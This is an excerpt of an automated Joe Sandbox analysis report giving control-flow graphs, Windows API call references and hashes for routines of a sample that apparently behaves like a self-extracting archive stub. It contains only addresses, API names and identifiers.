                                                                                • Opcode Fuzzy Hash: dbc48e129d0eb20d58e4881a689d0cad806e146c2747ea5d7dc8d94f0a4b95a3
                                                                                • Instruction Fuzzy Hash: 35316971E00209ABDF11DFE5DC49ADEBBB5FF44304F10802AE512B62A4EB7C6994CB18

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 882 414e08-414e2e _EH_prolog 883 414e30-414e32 882->883 884 414e36-414e4b 882->884 883->884 885 414e53-414e58 884->885 886 414e4d-414e50 884->886 887 414e6b-414e72 885->887 888 414e5a-414e5c 885->888 886->885 891 414e74-414e7a 887->891 889 414e64-414e66 888->889 890 414e5e-414e60 888->890 892 415420-415431 889->892 890->889 893 414eea-414ef3 call 402446 891->893 894 414e7c-414e80 891->894 898 414ef6-414efa 893->898 895 414e82-414e84 894->895 896 414e86-414e89 894->896 897 414e8c-414e9b 895->897 896->897 899 414ee7-414ee8 897->899 900 414e9d-414ea0 897->900 901 414f09-414f13 ??2@YAPAXI@Z 898->901 902 414efc-414efe 898->902 899->891 905 414ea2-414ea4 900->905 906 414ea6-414eaf 900->906 903 414f20 901->903 904 414f15-414f1e call 4132f1 901->904 910 414f02-414f04 902->910 909 414f22-414f2a 903->909 904->909 905->906 908 414eb2 905->908 906->908 912 414eb5-414eb8 908->912 913 414f32-414f67 call 413217 call 4140da ??2@YAPAXI@Z 909->913 914 414f2c-414f2e 909->914 910->892 915 414edb-414ee4 912->915 916 414eba-414ed9 912->916 922 414f86 913->922 923 414f69-414f84 913->923 914->913 915->899 916->912 924 414f88-414f92 922->924 923->924 925 414f94-414f96 924->925 926 414f9a-414fc6 call 4010f2 924->926 925->926 929 414fc9-414fd7 call 41320c 926->929 932 415019-41501f 929->932 933 414fd9-414fdb 929->933 934 415021-415023 932->934 935 415063-415074 932->935 936 414fe3-414fe8 933->936 937 414fdd-414fdf 933->937 940 415025-415027 934->940 941 41502b-415030 934->941 938 415076-415078 935->938 939 41507a-41507d 935->939 942 414ff0-414ffd call 414da0 936->942 943 414fea-414fec 936->943 937->936 945 415080-415096 938->945 939->945 940->941 946 415032-415034 941->946 947 415038-415045 call 414da0 941->947 953 415005-41500a 942->953 954 414fff-415001 942->954 943->942 950 41509c-4150cd 945->950 951 41512e-41515a call 414de3 945->951 946->947 957 415047-415049 947->957 958 41504d-415052 947->958 956 4150d0-4150d7 950->956 966 4151a1-4151a8 951->966 967 41515c-415161 951->967 959 415012-415014 953->959 960 41500c-41500e 953->960 954->953 962 4150d9-4150dd 956->962 963 4150ff-415105 956->963 957->958 958->889 964 415058-41505e 958->964 959->892 960->959 968 4150e3-4150e6 962->968 969 4150df-4150e1 962->969 965 415108-41510e 963->965 964->889 965->951 971 415110-41512c 965->971 972 415322-41533f 966->972 973 4151ae-4151b7 966->973 974 415163-415164 967->974 975 415169-41516e 967->975 970 4150e9-4150f2 968->970 969->970 970->963 976 4150f4-4150f7 970->976 971->965 972->892 972->929 978 4151c7-415218 call 411b60 call 4142cc 973->978 979 4151b9-4151c4 973->979 974->975 980 415170-415171 975->980 981 415176-415183 call 414da0 975->981 976->963 983 4150f9-4150fd 976->983 992 41521a-415220 978->992 993 41524f-415270 call 414d71 978->993 979->978 980->981 988 415185-415187 981->988 989 41518b-415190 981->989 983->956 988->989 989->910 991 415196-41519c 989->991 991->910 992->993 994 415222-415224 992->994 1002 415272-415280 ??3@YAXPAX@Z 993->1002 1003 4152cc-4152d0 993->1003 997 4152e9-4152f4 ??3@YAXPAX@Z 994->997 998 41522a-415244 call 414d71 ??3@YAXPAX@Z 994->998 1000 4152f5-4152f7 997->1000 1010 415314-415316 998->1010 1011 41524a 998->1011 1000->967 1004 4152fd-415303 1000->1004 1006 415282-415284 1002->1006 1007 415288-41528d 1002->1007 1008 4152d2-4152d7 1003->1008 1009 415308-415311 ??3@YAXPAX@Z 1003->1009 1004->967 1006->1007 1012 415295-41529a 1007->1012 1013 41528f-415291 1007->1013 1008->1009 1014 4152d9-4152e7 1008->1014 1009->1010 1018 415318-415319 1010->1018 1019 41531e 1010->1019 1011->1000 1015 4152a2-4152af call 414da0 1012->1015 1016 41529c-41529e 1012->1016 1013->1012 1014->997 1014->1009 1023 4152b1-4152b3 1015->1023 1024 4152b7-4152bc 1015->1024 1016->1015 1018->1019 1019->972 1023->1024 1025 4152c4-4152c7 1024->1025 1026 4152be-4152c0 1024->1026 1025->892 1026->1025
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00414E11
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038), ref: 00414F0B
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000038), ref: 00414F5D
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00415239
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00415275
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004152EC
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0041530B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$??2@$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 417953191-0
                                                                                • Opcode ID: 7ea25d764ab3e8e74e973da5d08c9edd31676f2b299df5307136354e582712ee
                                                                                • Instruction ID: e5ac9cdd0bbed24d41e0b9fd9aa7c31187e14acbe242ba4463aa1c93b9762be3
                                                                                • Opcode Fuzzy Hash: 7ea25d764ab3e8e74e973da5d08c9edd31676f2b299df5307136354e582712ee
                                                                                • Instruction Fuzzy Hash: 64123B75600649DFCB14DF68C894AEA7BB5BF89304F24416EF81A8B351DB39EC81CB58

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1028 404772-4047a9 lstrlenW call 411b84 call 4042f3 1033 4047b0-4047bb 1028->1033 1034 4047ab-4047ae 1028->1034 1035 4047de-4047e7 call 40317a 1033->1035 1034->1033 1034->1035 1038 4047e9-4047fc GetSystemTimeAsFileTime GetFileAttributesW 1035->1038 1039 4047cc-4047ce 1035->1039 1040 404813-40481c call 40317a 1038->1040 1041 4047fe-40480a call 4044ea 1038->1041 1042 4047d0-4047d2 1039->1042 1043 4047bd-4047c4 1039->1043 1056 40486d-404870 1040->1056 1057 40481e-40482b call 40976c 1040->1057 1041->1040 1054 40480c-40480e 1041->1054 1047 404880-404884 1042->1047 1048 4047d8-4047da 1042->1048 1043->1042 1046 4047c6-4047c9 1043->1046 1046->1042 1053 4047cb 1046->1053 1050 4048b0-4048c5 call 40976c ??3@YAXPAX@Z 1047->1050 1051 404886-404891 1047->1051 1048->1035 1065 4048c7-4048cb 1050->1065 1051->1050 1055 404893-404897 1051->1055 1053->1039 1061 4048a3-4048ae ??3@YAXPAX@Z 1054->1061 1055->1050 1062 404899-40489e 1055->1062 1059 404872-40487e ??3@YAXPAX@Z 1056->1059 1060 40482d-40484c memcpy 1056->1060 1057->1054 1059->1065 1068 40484e 1060->1068 1069 40485f-404863 1060->1069 1061->1065 1062->1050 1066 4048a0-4048a2 1062->1066 1066->1061 1072 40485e 1068->1072 1070 404850-404857 1069->1070 1071 404865-40486b 1069->1071 1070->1071 1073 404859-40485c 1070->1073 1071->1040 1072->1069 1073->1071 1073->1072
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404781
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                  • Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
                                                                                  • Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C
                                                                                • GetSystemTimeAsFileTime.KERNEL32(00402DFC,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047ED
                                                                                • GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047F4
                                                                                • memcpy.MSVCRT(?,0041AA3C,0041E869,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040483F
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404875
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C), ref: 004048A6
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,?,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C), ref: 004048BD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$FileTimememcpy$AttributesSystemlstrlenwcsncpy
                                                                                • String ID:
                                                                                • API String ID: 1217483450-0
                                                                                • Opcode ID: ed139c1ee860ba26562bb483b6c7d05f4130d2673af2f7f9270a5cd0c4e607a0
                                                                                • Instruction ID: 89c85a9677983eca3fd09eb0c7f4f9a8a3de002ff802481e92c4df94bfbc2cfd
                                                                                • Opcode Fuzzy Hash: ed139c1ee860ba26562bb483b6c7d05f4130d2673af2f7f9270a5cd0c4e607a0
                                                                                • Instruction Fuzzy Hash: F5411ABA900151EADB207BA59841ABF76B4EF85704F548837EA02F32C1E73C8D4283DD

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1074 405502-405597 LoadLibraryA #17 call 418d50 call 403d6d call 403dc8 * 7 1093 405599-4055ab SHGetSpecialFolderPathW 1074->1093 1094 4055f4-4055f8 1093->1094 1095 4055ad-4055cb wsprintfW call 405051 1093->1095 1094->1093 1096 4055fa-4055fe 1094->1096 1098 4055d0 1095->1098 1099 4055d2-4055d8 1098->1099 1100 4055da-4055e7 call 405051 1099->1100 1101 4055ec-4055f2 1099->1101 1100->1101 1101->1094 1101->1099
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 00405513
                                                                                • #17.COMCTL32(?,?,00000000), ref: 0040551E
                                                                                  • Part of subcall function 00403D6D: GetUserDefaultUILanguage.KERNEL32(0040552E,?,?,00000000), ref: 00403D77
                                                                                  • Part of subcall function 00403DC8: GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
                                                                                  • Part of subcall function 00403DC8: wsprintfW.USER32 ref: 00403E28
                                                                                  • Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
                                                                                  • Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E42
                                                                                  • Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403E5D
                                                                                  • Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
                                                                                  • Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E77
                                                                                  • Part of subcall function 00403DC8: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
                                                                                  • Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403E9C
                                                                                  • Part of subcall function 00403DC8: SetLastError.KERNEL32(?), ref: 00403EC3
                                                                                  • Part of subcall function 00403DC8: lstrlenA.KERNEL32(0041B930), ref: 00403EF9
                                                                                  • Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00403F14
                                                                                  • Part of subcall function 00403DC8: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46
                                                                                  • Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00403EBA
                                                                                  • Part of subcall function 00403DC8: _wtol.MSVCRT ref: 00403F57
                                                                                  • Part of subcall function 00403DC8: MultiByteToWideChar.KERNEL32(00000000,0041B930,00000001,00000000,00000002), ref: 00403F77
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004055A3
                                                                                • wsprintfW.USER32 ref: 004055B7
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$ErrorLast$??2@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLibraryLoadLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                • String ID: SfxFolder%02d$kernel32
                                                                                • API String ID: 2610933736-229743753
                                                                                • Opcode ID: 4f59de0ccd26ddab3e2610545df8152bf3f391f8ad542358498f73b56703a673
                                                                                • Instruction ID: fb37d50bbeb3418e991456411a156af5b0a8a8317b04918dd84ef7d62563be16
                                                                                • Opcode Fuzzy Hash: 4f59de0ccd26ddab3e2610545df8152bf3f391f8ad542358498f73b56703a673
                                                                                • Instruction Fuzzy Hash: 02219076950304AAE720AF77BC4AECA7BA8EF44705F10853FF415A61D0DA384984CF5C

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1103 40284e-402886 call 40242a CreateThread 1106 402888-40288f 1103->1106 1107 4028a9-4028b7 1103->1107 1108 402891-402896 call 408d16 1106->1108 1109 40289b-4028a4 WaitForSingleObject 1106->1109 1110 4028b9-4028bc 1107->1110 1111 4028ef-4028f8 1107->1111 1108->1109 1109->1107 1115 4028e3 1110->1115 1116 4028be-4028c1 1110->1116 1113 402958 1111->1113 1114 4028fa-4028fc 1111->1114 1118 40295d-402960 1113->1118 1120 402916-402922 1114->1120 1121 4028fe-40290b GetExitCodeThread 1114->1121 1117 4028e5-4028ed call 40976c 1115->1117 1122 4028c3-4028c6 1116->1122 1123 4028df-4028e1 1116->1123 1117->1113 1126 402924-402927 1120->1126 1127 40292c-402937 1120->1127 1121->1120 1125 40290d-402910 1121->1125 1128 4028c8-4028cb 1122->1128 1129 4028db-4028dd 1122->1129 1123->1117 1125->1120 1133 402912-402914 1125->1133 1134 402929-40292a 1126->1134 1130 402942-40294e SetLastError 1127->1130 1131 402939-402940 1127->1131 1135 4028d6-4028d9 1128->1135 1136 4028cd-4028d0 1128->1136 1129->1117 1137 402950-402955 call 40976c 1130->1137 1131->1113 1131->1130 1133->1118 1134->1137 1135->1134 1136->1113 1136->1135 1137->1113
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,00402734,?,00000000,0041E868), ref: 00402879
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 0040289E
                                                                                • GetExitCodeThread.KERNELBASE(00000000,0041AA3C,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 00402903
                                                                                • SetLastError.KERNEL32(0041AA3C,?,00403046,?,PreExtract,0041AA3C,0041E868), ref: 00402943
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2732711357-0
                                                                                • Opcode ID: 84fee42053e057f3378805e89464497ff8e350c1136537873458d8e55eef0d4b
                                                                                • Instruction ID: 8b2ec0040d8b5e9cc765cc96d666c658be7f578e6807eca23fde730058974b68
                                                                                • Opcode Fuzzy Hash: 84fee42053e057f3378805e89464497ff8e350c1136537873458d8e55eef0d4b
                                                                                • Instruction Fuzzy Hash: 8C31277A300201BADF356B11DE4DABB3B58FB85350F24823BF911B62D0D6B88881D71E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1152 40317a-403189 CreateDirectoryW 1153 4031b8-4031ba 1152->1153 1154 40318b-403198 GetLastError 1152->1154 1157 4031bb-4031bd 1153->1157 1155 4031a5-4031af GetFileAttributesW 1154->1155 1156 40319a 1154->1156 1155->1153 1159 4031b1-4031b3 1155->1159 1158 40319b-4031a3 SetLastError 1156->1158 1158->1157 1159->1153 1160 4031b5-4031b6 1159->1160 1160->1158
                                                                                APIs
                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,-00000001,004047E5,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract), ref: 00403181
                                                                                • GetLastError.KERNEL32(?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040318B
                                                                                • SetLastError.KERNEL32(000000B7,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 0040319B
                                                                                • GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004031A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                • String ID:
                                                                                • API String ID: 635176117-0
                                                                                • Opcode ID: 8433fba26e05a83753d4dc70028e505715306c94392b2ab9b50cde710c697177
                                                                                • Instruction ID: a90d619ace12dcc58cec56a8214a7704fd14c1b401374c1c4e5215055585a3f3
                                                                                • Opcode Fuzzy Hash: 8433fba26e05a83753d4dc70028e505715306c94392b2ab9b50cde710c697177
                                                                                • Instruction Fuzzy Hash: DDE092301451107AE6101F34AC0C6BB3A5C9B9EB23F184576F402E82D0D73C4906012A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1161 40235e-402388 call 411b84 call 4015ec 1166 40238b-402398 call 405041 1161->1166 1169 40239a-4023a3 1166->1169 1170 4023db-4023f0 call 411b84 call 40206f 1166->1170 1171 4023a5-4023a8 1169->1171 1172 4023aa-4023ad 1169->1172 1182 4023f5-402413 ??3@YAXPAX@Z 1170->1182 1171->1172 1175 4023be-4023d9 call 411be5 call 4015ec 1171->1175 1176 4023b4-4023b7 1172->1176 1177 4023af-4023b2 1172->1177 1175->1166 1179 402418-402427 ??3@YAXPAX@Z 1176->1179 1180 4023b9-4023bc 1176->1180 1177->1175 1177->1176 1180->1175 1180->1179 1182->1166
                                                                                APIs
                                                                                  • Part of subcall function 00411B84: memcpy.MSVCRT(?,?,00000002,00000000,?,?,00000000,004050A0,0041ADC8,?,?,?,00000000), ref: 00411BAA
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,00000000,?,PreExtract,0041AA3C,?,?,00406F9F,?,?,00000000,PreExtract), ref: 004023F8
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,00000000,?,PreExtract,0041AA3C,?,?,00406F9F,?,?), ref: 0040241B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy
                                                                                • String ID: PreExtract
                                                                                • API String ID: 750647942-1883995278
                                                                                • Opcode ID: e695908261d8e44da6e4391d7ef5d12bbb7850b021f519d7d2ccae3465a307d2
                                                                                • Instruction ID: 45d7e0e5023832e0b8c8538628168a0a11dddb05f7aa8aa784a61664bfc27f9f
                                                                                • Opcode Fuzzy Hash: e695908261d8e44da6e4391d7ef5d12bbb7850b021f519d7d2ccae3465a307d2
                                                                                • Instruction Fuzzy Hash: F8218671804106EBDF14EF91C986AEEB775EF11314F20442BE902B61E1E77C9E85CB98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1186 405e96-405ea5 1187 405ea7-405ee6 call 411bba call 40562e SetEnvironmentVariableW ??3@YAXPAX@Z 1186->1187 1188 405ee8-405eea 1186->1188 1187->1188
                                                                                APIs
                                                                                  • Part of subcall function 00411BBA: memcpy.MSVCRT(00000000,00000000,?,?,?,00000000,004025B9,?,?,0041E788,0040297D,00000000,?,0040508D,?,?), ref: 00411BD6
                                                                                • SetEnvironmentVariableW.KERNELBASE(0092BBC0,00000000,0092BBB4,SetEnvironment,00000000,?,00000000), ref: 00405ED0
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405ED9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@EnvironmentVariablememcpy
                                                                                • String ID: SetEnvironment
                                                                                • API String ID: 357128876-360490078
